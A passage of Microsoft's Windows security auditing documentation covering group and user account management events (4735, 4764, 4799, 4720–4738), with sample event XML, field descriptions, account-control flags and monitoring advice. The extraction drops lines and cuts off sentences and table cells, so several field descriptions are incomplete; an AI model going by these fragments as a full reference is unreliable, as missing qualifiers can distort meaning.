Some changes do not invoke a 4735 event,
for example, changes made using Active
Directory Users and Computers management
console in Managed By tab in group
account properties.
If you change the name of the group (SAM
Account Name), you also get “4781: The
name of an account was changed” if “Audit
User Account Management” subcategory
success auditing is enabled.
If you change the group type, you get a
change event from the new group type auditing subcategory instead of 4735. If you need to monitor for group
type changes, it is better to monitor for “4764: A group’s type was changed.” These events are generated for any
group type when group type is changed. “Audit Security Group Management” subcategory success auditing must
be enabled.
From 4735 event you can get information about changes of sAMAccountName and sIDHistory attributes or
you will see that something changed, but will not be able to see what exactly changed.
Event XML:
- <System>
<Level>0</Level>
<Task>13826</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">AccountOperators\_NEW</Data>
<Data Name="SamAccountName">AccountOperators\_NEW</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “change group” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “change group”
operation.
the following:
Group:
Security ID [Type = SID ]: SID of changed group. Event Viewer automatically tries to resolve SIDs and show
Note Sometimes you can see the Group\Security ID field contains an old group name in Event Viewer (as
you can see in the event example). That happens because Event Viewer caches names for SIDs that it has
already resolved for the current session.
Note Security ID field has the same value as new group name (Changed Attributes>SAM Account
Name). That is happens because event is generated after name was changed and SID resolves to the new
name. It is always better to use SID instead of group names for queries or filtering of events, because you will
know for sure that this the right object you are looking for or want to monitor.
Group Name [Type = UnicodeString]: the name of the group that was changed. For example: ServiceDesk
Group Domain [Type = UnicodeString]: domain or computer name of the changed group. Formats vary,
Changed Attributes:
You might see a 4735 event without any changes inside, that is, where all Changed Attributes apear as “-“. This
usually happens when a change is made to an attribute that is not listed in the event. In this case there is no way
to determine which attribute was changed. For example, this would happen if you change the Description of a
group object using the Active Directory Users and Computers administrative console. Also, if the discretionary
access control list (DACL ) is changed, a 4735 event will generate, but all attributes will be “-“.
SAM Account Name [Type = UnicodeString]: This is a new name of changed group used to support
clients and servers from previous versions of Windows (pre-Windows 2000 logon name). If the value of
sAMAccountName attribute of group object was changed, you will see the new value here. For example:
ServiceDesk. For local groups it is simply a new name of the group, if it was changed.
from another domain. Whenever an object is moved from one domain to another, a new SID is created
and becomes the objectSID. The previous SID is added to the sIDHistory property. If the value of
sIDHistory attribute of group object was changed, you will see the new value here. For local groups it is
not applicable and always has “-“ value.
example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as
“-”. See full list of user privileges in “Table 8. User Privileges.”.

For 4735(S ): A security-enabled local group was changed.
Important For this event, also see Appendix A: Security monitoring recommendations for many audit
events.
If you have a list of critical local or domain security groups in the organization, and need to specifically
monitor these groups for any change, monitor events with the “Group\Group Name” values that
correspond to the critical local or domain security groups.
If you need to monitor each time a member is added to a local or domain security group, to see who added
the member and when, monitor this event. Typically, this event is used as an informational event, to be
reviewed if needed.
4764(S): A group’s type was changed.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit
Security Group
Management
Event Description:
This event generates
every time group’s type
is changed.
This event generates for
both security and
distribution groups.
only on domain
controllers.
Note For
Security Monitoring
Recommendations for
this event.
Event XML:
- <System>
<Level>0</Level>
<Task>13826</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="GroupTypeChange">Security Enabled Local Group Changed to Security Disabled Local Group.</Data>
<Data Name="TargetUserName">CompanyAuditors</Data>
<Data Name="SubjectLogonId">0x38200</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “change group type” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “change group type”
operation.
the following:
Change Type [Type = UnicodeString]: contains three parts: “<Param1> Changed To <Param2>.”. These two
parameters can have the following values (they cannot have the same value at the same time):
Security Disabled Local Group
Security Disabled Universal Group
Security Disabled Global Group
Security Enabled Local Group
Security Enabled Universal Group
Security Enabled Global Group
Group:
Security ID [Type = SID ]: SID of changed group. Event Viewer automatically tries to resolve SIDs and
Group Name [Type = UnicodeString]: the name of the group, which type was changed. For example:
ServiceDesk
Group Domain [Type = UnicodeString]: domain or computer name of the changed group. Formats vary,

For 4764(S ): A group’s type was changed.
If you have a list of critical local or domain groups in the organization, and need to specifically monitor
these groups for any change, especially group type change, monitor events with the “Group\Group
Name” values that correspond to the critical distribution groups. Examples of critical local or domain
groups are built-in local administrators group, domain admins, enterprise admins, critical distribution
groups, and so on.
If you need to monitor each time any group’s type is changed, to see who changed it and when, monitor
this event. Typically, this event is used as an informational event, to be reviewed if needed.
4799(S): A security-enabled local group membership
was enumerated.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
This event generates when a process
enumerates the members of a security-enabled
local group on the computer or device.
This event doesn't generate when group
members were enumerated using Active
Directory Users and Computers snap-in.

Event XML:
- <System>
<Level>0</Level>
<Task>13826</Task>
<Opcode>0</Opcode>
<Correlation ActivityID="{CBAEDE08-1CF0-0000-50DE-AECBF01CD101}" />
<Computer>WIN10-1.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">Administrators</Data>
<Data Name="TargetDomainName">Builtin</Data>
<Data Name="TargetSid">S-1-5-32-544</Data>
<Data Name="SubjectLogonId">0x72d9d</Data>
<Data Name="CallerProcessId">0xc80</Data>
<Data Name="CallerProcessName">C:\\Windows\\System32\\mmc.exe</Data>
</EventData>
</Event>
Required Server Roles: none.

Minimum OS Version: Windows Server 2016, Windows 10.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “enumerate security-enabled local group
members” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID
cannot be resolved, you will see the source data in the event.
Account Name [Type = UnicodeString]: the name of the account that requested the “enumerate security-
enabled local group members” operation.
the following:
Group:
Security ID [Type = SID ]: SID of the group which members were enumerated. Event Viewer automatically
tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data
in the event.
Group Name [Type = UnicodeString]: the name of the group which members were enumerated.
Group Domain [Type = UnicodeString]: group’s domain or computer name. Formats vary, and
For Builtin groups this field has “Builtin” value.
For a local group, this field will contain the name of the computer to which this group belongs, for
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that enumerated the members of the
group. Process ID (PID ) is a number used by the operating system to uniquely identify an active process. To
see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column):
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process has
been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.

For 4799(S ): A security-enabled local group membership was enumerated.
If you have a list of critical local security groups in the organization, and need to specifically monitor these
groups for any access (in this case, enumeration of group membership), monitor events with the
“Group\Group Name” values that correspond to the critical local security groups. Examples of critical local
groups are built-in local administrators, built-in backup operators, and so on.
If you need to monitor each time the membership is enumerated for a local or domain security group, to see
who enumerated the membership and when, monitor this event. Typically, this event is used as an
informational event, to be reviewed if needed.
Applies to
Windows 10
Windows Server 2016
Audit User Account Management determines whether the operating system generates audit events when
specific user account management tasks are performed.
Event volume: Low.
This policy setting allows you to audit changes to user accounts. Events include the following:
A user account is created, changed, deleted, renamed, disabled, enabled, locked out or unlocked.
A user account’s password is set or changed.
A security identifier (SID ) is added to the SID History of a user account, or fails to be added.
The Directory Services Restore Mode password is configured.
Permissions on administrative user accounts are changed.
A user's local group membership was enumerated.
Credential Manager credentials are backed up or restored.
Some events in this subcategory, for example 4722, 4725, 4724, and 4781, are also generated for computer
accounts.
STRONGER STRONGER
STRONGER STRONGER
Domain Yes Yes Yes Yes This subcategory

Controller contains many
useful events for
monitoring,
especially for
critical domain
accounts, such as
domain admins,
service accounts,
database admins,
and so on.
We recommend
Failure auditing,
mostly to see
invalid password
change and reset
attempts for
domain
accounts, DSRM
account
password change
failures, and
failed SID History
add attempts.
Member Server Yes Yes Yes Yes We recommend

monitoring all
changes related
to local user
accounts,
especially built-in
local
Administrator
and other critical
accounts.
We recommend
Failure auditing,
mostly to see
invalid password
change and reset
attempts for
local accounts.
Workstation Yes Yes Yes Yes We recommend

monitoring all
changes related
to local user
accounts,
especially built-in
local
Administrator
and other critical
accounts.
We recommend
Failure auditing,
mostly to see
invalid password
change and reset
attempts for
local accounts.
Events List:
4720(S ): A user account was created.
4722(S ): A user account was enabled.
4723(S, F ): An attempt was made to change an account's password.
4724(S, F ): An attempt was made to reset an account's password.
4725(S ): A user account was disabled.
4726(S ): A user account was deleted.
4738(S ): A user account was changed.
4740(S ): A user account was locked out.
4765(S ): SID History was added to an account.
4766(F ): An attempt to add SID History to an account failed.
4767(S ): A user account was unlocked.
4780(S ): The ACL was set on accounts which are members of administrators groups.
4781(S ): The name of an account was changed.
4794(S, F ): An attempt was made to set the Directory Services Restore Mode administrator password.
4798(S ): A user's local group membership was enumerated.
5376(S ): Credential Manager credentials were backed up.
5377(S ): Credential Manager credentials were restored from a backup.
4720(S): A user account was created.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit User Account
Management
Event Description:
This event generates every time a new user
object is created.

Event XML:
- <System>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">ksmith</Data>
<Data Name="SubjectLogonId">0x30dc2</Data>
<Data Name="SamAccountName">ksmith</Data>
<Data Name="DisplayName">Ken Smith</Data>
<Data Name="UserPrincipalName">ksmith@contoso.local</Data>
<Data Name="PasswordLastSet">%%1794</Data>
<Data Name="AccountExpires">%%1794</Data>
<Data Name="PrimaryGroupId">513</Data>
<Data Name="UserAccountControl">%%2080 %%2082 %%2084</Data>
<Data Name="LogonHours">%%1793</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “create user account” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “create user account”
operation.
the following:
New Account:
Security ID [Type = SID ]: SID of created user account. Event Viewer automatically tries to resolve SIDs and
show the account name. If the SID cannot be resolved, you will see the source data in the event.
Account Name [Type = UnicodeString]: the name of the user account that was created. For example:
dadmin.
Account Domain [Type = UnicodeString]: domain name of created user account. Formats vary, and
For local accounts, this field will contain the name of the computer to which this new account
belongs, for example: “Win81”.
Attributes:
from previous versions of Windows (pre-Windows 2000 logon name). The value of sAMAccountName
attribute of new user object. For example: ksmith. For local account this field contains the name of new user
account.
Display Name [Type = UnicodeString]: the value of displayName attribute of new user object. It is a
name displayed in the address book for a particular account .This is usually the combination of the user's
first name, middle initial, and last name. For example, Ken Smith. You can change this attribute by using
Active Directory Users and Computers, or through a script, for example. Local accounts contain Full Name
attribute in this field, but for new local accounts this field typically has value “<value not set>”.
Internet standard RFC 822. By convention this should map to the account's email name. This parameter
contains the value of userPrincipalName attribute of new user object. For example, ksmith@contoso.local.
For local users this field is not applicable and has value “-“. You can change this attribute by using Active
Home Directory [Type = UnicodeString]: user's home directory. If homeDrive attribute is set and specifies
a drive letter, homeDirectory should be a UNC path. The path must be a network UNC of the form
\\Server\Share\Directory. This parameter contains the value of homeDirectory attribute of new user
object. For new local accounts this field typically has value “<value not set>”. You can change this attribute
by using Active Directory Users and Computers, or through a script, for example. This parameter might not
be captured in the event, and in that case appears as “-”.
example – “H:”. This parameter contains the value of homeDrive attribute of new user object. You can
change this attribute by using Active Directory Users and Computers, or through a script, for example. This
parameter might not be captured in the event, and in that case appears as “-”. For new local accounts this
field typically has value “<value not set>”.
Script Path [Type = UnicodeString]: specifies the path of the account’s logon script. This parameter
contains the value of scriptPath attribute of new user object. You can change this attribute by using Active
the event, and in that case appears as “-”. For new local accounts this field typically has value “<value not
set>”.
a local absolute path, or a UNC path. This parameter contains the value of profilePath attribute of new user
object. You can change this attribute by using Active Directory Users and Computers, or through a script, for
example. This parameter might not be captured in the event, and in that case appears as “-”. For new local
accounts this field typically has value “<value not set>”.
the sAMAccountName property of a user object. This parameter contains the value of userWorkstations
attribute of new user object. You can change this attribute by using Active Directory Users and Computers,
or through a script, for example. This parameter might not be captured in the event, and in that case appears
as “-”. For local users this field is not applicable and typically has value “<value not set>”.
Password Last Set [Type = UnicodeString]: last time the account’s password was modified. For manually
created user account, using Active Directory Users and Computers snap-in, this field typically has value
“<never>”. This parameter contains the value of pwdLastSet attribute of new user object.
Account Expires [Type = UnicodeString]: the date when the account expires. This parameter contains the
value of accountExpires attribute of new user object. You can change this attribute by using Active
the event, and in that case appears as “-”. For manually created local and domain user accounts this field
typically has value “<never>”.
Primary Group ID [Type = UnicodeString]: Relative Identifier (RID ) of user’s object primary group.
domain.
Typically, Primary Group field for new user accounts has the following values:
513 (Domain Users. For local accounts this RID means Users) – for domain and local users.
See this article https://support.microsoft.com/kb/243330 for more information. This parameter contains the
value of primaryGroupID attribute of new user object.
Allowed To Delegate To [Type = UnicodeString]: the list of SPNs to which this account can present delegated
credentials. Can be changed using Active Directory Users and Computers management console in Delegation
tab of user account, if this account has at least one SPN registered. This parameter contains the value of
AllowedToDelegateTo attribute of new user object. For local user accounts this field is not applicable and
typically has value “-“. For new domain user accounts it is typically has value “-“. See description of
AllowedToDelegateTo field for “4738(S ): A user account was changed.” event for more details.
script, and other behavior for the user account. Old UAC value always “0x0” for new user accounts. This
parameter contains the previous value of userAccountControl attribute of user object.
script, and other behavior for the user account. This parameter contains the value of userAccountControl
attribute of new user object.
event. Subtract the property value from the flags value in the event and note that the flag applies and then go on to
the next flag.
Decoding:
• LOCKOUT 0x0010
• SCRIPT 0x0001
You will see a line of text for each change. For new user accounts, when the object for this account was created,
the userAccountControl value was considered to be “0x0”, and then it was changed from “0x0” to the real
value for the account's userAccountControl attribute. See possible values in the table below. In the “User
Account Control field text” column, you can see the text that will be displayed in the User Account Control
field in 4720 event.

SCRIPT 0x0001 1 The logon script will Changes of this flag

be run. do not show in 4720
events.
ACCOUNTDISABLE 0x0002 2 The user account is Account Disabled

disabled. Account Enabled
Undeclared 0x0004 4 This flag is Changes of this flag

undeclared. do not show in 4720
events.
HOMEDIR_REQUIRED 0x0008 8 The home folder is 'Home Directory

'Home Directory
LOCKOUT 0x0010 16 Changes of this flag

do not show in 4720
events.
PASSWD_NOTREQD 0x0020 32 No password is 'Password Not

'Password Not
PASSWD_CANT_CHA 0x0040 64 The user cannot Changes of this flag

NGE change the password. do not show in 4720
This is a permission events.
on the user's object.
ENCRYPTED_TEXT_PW 0x0080 128 The user can send an 'Encrypted Text

D_ALLOWED encrypted password. Password Allowed' -
Can be set using Disabled
“Store password using 'Encrypted Text
reversible encryption” Password Allowed' -
checkbox. Enabled
TEMP_DUPLICATE_AC 0x0100 256 This is an account for Cannot be set for

COUNT users whose primary computer account.
account is in another
domain. This account
provides user access
to this domain, but
not to any domain
that trusts this
domain. This is
sometimes referred to
as a local user
account.
NORMAL_ACCOUNT 0x0200 512 This is a default 'Normal Account' -

account type that Disabled
represents a typical 'Normal Account' -
user. Enabled
INTERDOMAIN_TRUS 0x0800 2048 This is a permit to Cannot be set for

T_ACCOUNT trust an account for a computer account.
system domain that
trusts other domains.
WORKSTATION_TRUS 0x1000 4096 This is a computer 'Workstation Trust

T_ACCOUNT account for a Account' - Disabled
computer that is 'Workstation Trust
running Microsoft Account' - Enabled
Windows NT 4.0
Workstation,
Microsoft Windows
NT 4.0 Server,
Microsoft Windows
2000 Professional, or
Windows 2000 Server
and is a member of
this domain.
SERVER_TRUST_ACCO 0x2000 8192 This is a computer 'Server Trust Account'

UNT account for a domain - Enabled
controller that is a 'Server Trust Account'
member of this - Disabled
domain.
DONT_EXPIRE_PASSW 0x10000 65536 Represents the 'Don't Expire

ORD password, which Password' - Disabled
should never expire 'Don't Expire
on the account. Password' - Enabled
Can be set using
“Password never
expires” checkbox.
MNS_LOGON_ACCO 0x20000 131072 This is an MNS logon 'MNS Logon Account'

UNT account. - Disabled
'MNS Logon Account'
- Enabled
SMARTCARD_REQUIR 0x40000 262144 When this flag is set, 'Smartcard Required' -

ED it forces the user to Disabled
log on by using a 'Smartcard Required' -
smart card. Enabled
TRUSTED_FOR_DELEG 0x80000 524288 When this flag is set, 'Trusted For

ATION the service account Delegation' - Enabled
(the user or computer 'Trusted For
account) under which Delegation' - Disabled
a service runs is
delegation. Any such
service can
impersonate a client
requesting the
service. To enable a
service for Kerberos
delegation, you must
set this flag on the
userAccountControl
property of the
service account.
If you enable
Kerberos constraint or
unconstraint
these types of
delegation in
Delegation tab you
will get this flag
changed.
NOT_DELEGATED 0x100000 1048576 When this flag is set, 'Not Delegated' -

the security context of Disabled
the user is not 'Not Delegated' -
delegated to a service Enabled
even if the service
account is set as
delegation.
Can be set using
“Account is sensitive
and cannot be
delegated” checkbox.
USE_DES_KEY_ONLY 0x200000 2097152 Restrict this principal 'Use DES Key Only' -
to use only Data Disabled
Encryption Standard 'Use DES Key Only' -
(DES) encryption Enabled
types for keys.
Can be set using “Use
Kerberos DES
encryption types for
this account”
checkbox.
DONT_REQ_PREAUTH 0x400000 4194304 This account does not 'Don't Require

require Kerberos pre- Preauth' - Disabled
authentication for 'Don't Require
logging on. Preauth' - Enabled
Can be set using “Do
not require Kerberos
preauthentication”
checkbox.
PASSWORD_EXPIRED 0x800000 8388608 The user's password Changes of this flag

has expired. do not show in 4720
events.
TRUSTED_TO_AUTH_F 0x1000000 16777216 The account is 'Trusted To

OR_DELEGATION enabled for Authenticate For
delegation. This is a Delegation' - Disabled
security-sensitive 'Trusted To
setting. Accounts that Authenticate For
have this option Delegation' - Enabled
enabled should be
tightly controlled. This
setting lets a service
that runs under the
account assume a
client's identity and
authenticate as that
user to other remote
servers on the
network.
If you enable
Kerberos protocol
transition delegation
or disable this type of
delegation in
Delegation tab you
will get this flag
changed.
PARTIAL_SECRETS_AC 0x04000000 67108864 The account is a read- No information.

COUNT only domain
controller (RODC).
This is a security-
sensitive setting.
Removing this setting
from an RODC
compromises security
on that server.
For new, manually created, domain or local user accounts typical flags are:
Account Disabled
'Password Not Required' - Enabled
'Normal Account' – Enabled
After new user creation event you will typically see couple of “4738: A user account was changed.” events
with new flags:
'Password Not Required' – Disabled
Account Enabled
Computers management console in Dial-in tab of user’s account properties, then you will see <value
changed, but not displayed> in this field in “4738: A user account was changed.” This parameter might
not be captured in the event, and in that case appears as “-”. For new local accounts this field typically has
value “<value not set>”.
value of sIDHistory attribute of new user object. This parameter might not be captured in the event, and in
that case appears as “-”.
Logon Hours [Type = UnicodeString]: hours that the account is allowed to logon to the domain. The value
of logonHours attribute of new user object. You can change this attribute by using Active Directory Users
and Computers, or through a script, for example. You will typically see “<value not set>” value for new
manually created user accounts in event 4720. For new local accounts this field is not applicable and
typically has value “All”.

For 4720(S ): A user account was created.
Some organizations monitor every 4720 event.

SAM Account Name is empty or - This field must contain the user account name. If it is empty or
-, it might indicate an anomaly.
User Principal Name is empty or - Typically this field should not be empty for new user accounts.
If it is empty or -, it might indicate an anomaly.
Home Directory is not - Typically these fields are - for new user accounts. Other values
Home Drive is not - might indicate an anomaly and should be monitored.
Script Path is not - For local accounts these fields should display <value not
Profile Path is not - set>.
Password Last Set is <never> This typically means this is a manually created user account,
which you might need to monitor.
Password Last Set is a time in the future This might indicate an anomaly.
Account Expires is not <never> Typically this field is <never> for new user accounts. Other
values might indicate an anomaly and should be monitored.
Primary Group ID is not 513 Typically, the Primary Group value is 513 for domain and
local users. Other values should be monitored.
Allowed To Delegate To is not - Typically this field is - for new user accounts. Other values
might indicate an anomaly and should be monitored.
Old UAC Value is not 0x0 Typically this field is 0x0 for new user accounts. Other values
might indicate an anomaly and should be monitored.
Logon Hours value other than <value not set> or** “All”** This should always be <value not set> for new domain user
accounts, and “All” for new local user accounts.
Consider whether to track the following user account control flags:
'Normal Account' – Disabled Should not be disabled for user accounts.
'Encrypted Text Password Allowed' – Enabled By default, these flags should not be enabled for new user
'Smartcard Required' – Enabled accounts created with the “Active Directory Users and
'Not Delegated' – Enabled Computers” snap-in.
'Use DES Key Only' – Enabled
'Don't Require Preauth' – Enabled
'Trusted To Authenticate For Delegation' – Enabled
'Server Trust Account' – Enabled Should never be enabled for user accounts. Applies only to
domain controller (computer) accounts.
'Don't Expire Password' – Enabled Should be monitored for critical accounts, or all accounts if
your organization does not allow this flag. By default, this flag
should not be enabled for new user accounts created with the
“Active Directory Users and Computers” snap-in.
'Trusted For Delegation' – Enabled By default, this flag should not be enabled for new user
accounts created with the “Active Directory Users and
Computers” snap-in. It is enabled by default only for new
domain controllers.
4722(S): A user account was enabled.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
This event generates every time user or
computer object is enabled.
For user accounts, this event generates on
domain controllers, member servers, and
workstations.
For computer accounts, this event generates
only on domain controllers.

Event XML:
- <System>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">Auditor</Data>
<Data Name="SubjectLogonId">0x30d5f</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “enable account” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “enable account”
operation.
the following:
Target Account:
Security ID [Type = SID ]: SID of account that was enabled. Event Viewer automatically tries to resolve
Account Name [Type = UnicodeString]: the name of the account that was enabled.
Account Domain [Type = UnicodeString]: target account’s domain or computer name. Formats vary, and

For 4722(S ): A user account was enabled.
If you have a high-value domain or local account for which you need to monitor every change, monitor all
4722 events with the “Target Account\Security ID” that corresponds to the account.
If you have domain or local accounts that should never be enabled, you can monitor all 4722 events with
the “Target Account\Security ID” fields that correspond to the accounts.
We recommend monitoring all 4722 events for local accounts, because these accounts usually do not
change often. This is especially relevant for critical servers, administrative workstations, and other high
value assets.
4723(S, F): An attempt was made to change an
account's password.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
This event generates every time a user
attempts to change his or her password.
workstations.
For domain accounts, a Failure event
generates if new password fails to meet the
password policy.
For local accounts, a Failure event generates if
new password fails to meet the password
policy or old password is wrong.
For domain accounts if old password was
wrong, then “4771: Kerberos pre-
authentication failed” or “4776: The computer attempted to validate the credentials for an account” will be
generated on domain controller if specific subcategories were enabled on it.
Typically you will see 4723 events with the same Subject\Security ID and Target Account\Security ID fields,
which is normal behavior.
Event XML:
- <System>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SubjectLogonId">0x1a9b76</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made an attempt to change Target’s Account password. Event
Account Name [Type = UnicodeString]: the name of the account that made an attempt to change Target’s
Account password.
the following:
Target Account: account for which the password change was requested.
Security ID [Type = SID ]: SID of account for which the password change was requested. Event Viewer
Account Name [Type = UnicodeString]: the name of the account for which the password change was
requested.

For 4723(S, F ): An attempt was made to change an account's password.
If you have a high-value domain or local user account for which you need to monitor every password
change attempt, monitor all 4723 events with the “Target Account\Security ID” that corresponds to the
account.
If you have domain or local accounts for which the password should never be changed, you can monitor all
4724(S, F): An attempt was made to reset an
account's password.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
This event generates every time an account
attempted to reset the password for another
account.
workstations.
For domain accounts, a Failure event
generates if the new password fails to meet
the password policy.
A Failure event does NOT generate if user gets
“Access Denied” while doing the password
reset procedure.
This event also generates if a computer account reset procedure was performed.
For local accounts, a Failure event generates if the new password fails to meet the local password policy.
Event XML:
- <System>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">User1</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made an attempt to reset Target’s Account password. Event
Account Name [Type = UnicodeString]: the name of the account that made an attempt to reset Target’s
Account password.
the following:
Target Account: account for which password reset was requested.
Security ID [Type = SID ]: SID of account for which password reset was requested. Event Viewer
Account Name [Type = UnicodeString]: the name of the account for which password reset was requested.

For 4724(S, F ): An attempt was made to reset an account's password.
If you have a high-value domain or local user account for which you need to monitor every password reset
attempt, monitor all 4724 events with the “Target Account\Security ID” that corresponds to the account.
If you have domain or local accounts for which the password should never be reset, you can monitor all
We recommend monitoring all 4724 events for local accounts, because their passwords usually do not
value assets.
4725(S): A user account was disabled.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
This event generates every time user or
computer object is disabled.
workstations.

Event XML:
- <System>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “disable account” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “disable account”
operation.
the following:
Target Account:
Security ID [Type = SID ]: SID of account that was disabled. Event Viewer automatically tries to resolve
Account Name [Type = UnicodeString]: the name of the account that was disabled.

For 4725(S ): A user account was disabled.
If you have domain or local accounts that should never be disabled (for example, service accounts), you can
monitor all 4725 events with the “Target Account\Security ID” that corresponds to the account.
We recommend monitoring all 4725 events for local accounts, because these accounts usually do not
value assets.
4726(S): A user account was deleted.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
This event generates every time user object
was deleted.

Event XML:
- <System>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “delete user account” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “delete user account”
operation.
the following:
Target Account:
Security ID [Type = SID ]: SID of account that was deleted. Event Viewer automatically tries to resolve SIDs
and show the account name. If the SID cannot be resolved, you will see the source data in the event.
Account Name [Type = UnicodeString]: the name of the account that was deleted.

For 4726(S ): A user account was deleted.
If you have a high-value domain or local account for which you need to monitor every change (or deletion),
monitor all 4726 events with the “Target Account\Security ID” that corresponds to the account.
If you have a domain or local account that should never be deleted (for example, service accounts), monitor
all 4726 events with the “Target Account\Security ID” that corresponds to the account.
We recommend monitoring all 4726 events for local accounts, because these accounts typically are not
deleted often. This is especially relevant for critical servers, administrative workstations, and other high
value assets.
4738(S): A user account was changed.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
This event generates every time user object is
changed.
For each change, a separate 4738 event will
be generated.
You might see this event without any changes
inside, that is, where all Changed Attributes
apear as “-“. This usually happens when a
change is made to an attribute that is not
listed in the event. In this case there is no way
to determine which attribute was changed.
For example, if the discretionary access
control list (DACL ) is changed, a 4738 event
will generate, but all attributes will be “-“.
Some changes do not invoke a 4738 event.

event.
Event XML:
- <System>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="Dummy">-</Data>
<Data Name="SubjectLogonId">0x30dc2</Data>
<Data Name="SamAccountName">-</Data>
<Data Name="PasswordLastSet">-</Data>
<Data Name="AccountExpires">-</Data>
<Data Name="PrimaryGroupId">-</Data>
<Data Name="UserAccountControl">%%2050 %%2089</Data>
<Data Name="LogonHours">-</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “change user account” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “change user
account” operation.
the following:
Target Account:
Security ID [Type = SID ]: SID of account that was changed. Event Viewer automatically tries to resolve
Account Name [Type = UnicodeString]: the name of the account that was changed.
Changed Attributes:
If attribute was not changed it will have “–“ value.
Unfortunately, for local accounts, all fields, except changed attributes, will have previous values populated. Also,
the User Account Control field will have values only if it was modified. Changed attributes will have new values,
but it is hard to understand which attribute was really changed.
from previous versions of Windows (pre-Windows 2000 logon name). If the value of sAMAccountName
attribute of user object was changed, you will see the new value here. For example: ladmin. For local
accounts, this field always has some value—if the account's attribute was not changed it will contain the
current value of the attribute.
Display Name [Type = UnicodeString]: it is a name, displayed in the address book for a particular account.
This is usually the combination of the user's first name, middle initial, and last name. You can change this
attribute by using Active Directory Users and Computers, or through a script, for example. If the value of
displayName attribute of user object was changed, you will see the new value here. For local accounts,
this field always has some value—if the account's attribute was not changed it will contain the current value
of the attribute.
Internet standard RFC 822. By convention this should map to the account's email name. If the value of
userPrincipalName attribute of user object was changed, you will see the new value here. You can change
this attribute by using Active Directory Users and Computers, or through a script, for example. For local
accounts, this field is not applicable and always has “-“ value.
Home Directory [Type = UnicodeString]: user's home directory. If homeDrive attribute is set and
specifies a drive letter, homeDirectory should be a UNC path. The path must be a network UNC of the
form \\Server\Share\Directory. If the value of homeDirectory attribute of user object was changed, you
will see the new value here. You can change this attribute by using Active Directory Users and Computers,
or through a script, for example. For local accounts, this field always has some value—if the account's
attribute was not changed it will contain the current value of the attribute.
example – “H:”. If the value of homeDrive attribute of user object was changed, you will see the new value
here. You can change this attribute by using Active Directory Users and Computers, or through a script, for
example. For local accounts, this field always has some value—if the account's attribute was not changed it
will contain the current value of the attribute.
Script Path [Type = UnicodeString]: specifies the path of the account’s logon script. If the value of
scriptPath attribute of user object was changed, you will see the new value here. You can change this
attribute by using Active Directory Users and Computers, or through a script, for example. For local
Profile Path [Type = UnicodeString]: specifies a path to the account's profile. This value can be a null
string, a local absolute path, or a UNC path. If the value of profilePath attribute of user object was
changed, you will see the new value here. You can change this attribute by using Active Directory Users and
Computers, or through a script, for example. For local accounts, this field always has some value—if the
account's attribute was not changed it will contain the current value of the attribute.
the sAMAccountName property of a computer object. If the value of userWorkstations attribute of user
object was changed, you will see the new value here. You can change this attribute by using Active
Directory Users and Computers, or through a script, for example. For local accounts, this field is not
